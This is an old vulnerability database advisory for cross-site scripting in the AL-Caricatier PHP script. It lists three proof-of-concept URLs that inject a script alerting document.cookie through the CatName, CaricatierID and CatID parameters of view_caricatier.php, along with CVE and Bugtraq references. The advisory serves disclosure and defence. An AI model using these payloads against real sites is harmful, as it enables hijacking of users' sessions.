AL-Caricatier view_caricatier.php Multiple Variable XSS

2006-03-28T03:27:05
ID OSVDB:24489
Type osvdb
Reporter OSVDB
Modified 2006-03-28T03:27:05

Description

Manual Testing Notes

http://[target]/AL-Caricatier/view_caricatier.php?CatName='><script>alert(document.cookie);</script> http://[target]/AL-Caricatier/view_caricatier.php?CaricatierID='><script>alert(document.cookie);</script> http://[target]/AL-Caricatier/view_caricatier.php?CatID='><script>alert(document.cookie);</script>

References:

Vendor URL: http://www.php-ar.com/ Secunia Advisory ID:17292 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0532.html CVE-2006-1556 Bugtraq ID: 17289